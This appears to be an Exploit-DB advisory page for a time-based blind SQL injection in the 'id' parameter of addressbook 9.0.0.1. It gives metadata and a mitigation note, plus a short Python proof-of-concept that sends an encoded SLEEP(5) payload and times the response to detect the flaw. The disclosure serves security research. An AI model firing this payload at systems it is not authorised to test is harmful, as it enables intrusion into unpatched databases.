addressbook 9.0.0.1 - 'id' SQL Injection

vendor:

addressbook

by:

David Velazquez a.k.a. d4sh&r000

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: addressbook

Affected Version From: 9.0.0.1

Affected Version To: 9.0.0.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu Server 20.04 LTS

2020

addressbook 9.0.0.1 – ‘id’ SQL Injection

addressbook 9.0.0.1 is vulnerable to time-based blind SQL injection. The vulnerability allows an attacker to manipulate the 'id' parameter in the URL to execute arbitrary SQL queries.

Mitigation:

The vendor should sanitize user input and use parameterized queries to prevent SQL injection attacks. Users should ensure they are using the latest version of the software.

Source

Exploit-DB raw data:

# Title: addressbook 9.0.0.1 - 'id' SQL Injection 
# Date: 2020-04-01
# Author: David Velazquez a.k.a. d4sh&r000
# vulnerable application:  https://sourceforge.net/projects/php-addressbook/files/latest/download
# vulnerable version: 9.0.0.1
# Discription: addressbook 9.0.0.1 time-based blind SQL injection 
# Tested On: Ubuntu Server 20.04 LTS
# Platform: PHP
# Type: webapp

# Use:
# addressbook9-SQLi.py #http://127.0.0.1/photo.php?id=1'


#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import requests

def isVulnerable(URL):
    """Check if the URL is vulnerable to ime-based blind SQL injection"""
    response = requests.get(URL+'%27%20AND%20(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy')
    s=response.elapsed.total_seconds()
    if s>5:#I put a sleep sentence to test the bug
      sys.stdout.write('[+] Aplication is vulnerable!!!\n')
    else:
      sys.stdout.write('[+] Aplication NOT vulnerable\n')    
    
if __name__ == "__main__":
    isVulnerable(sys.argv[1])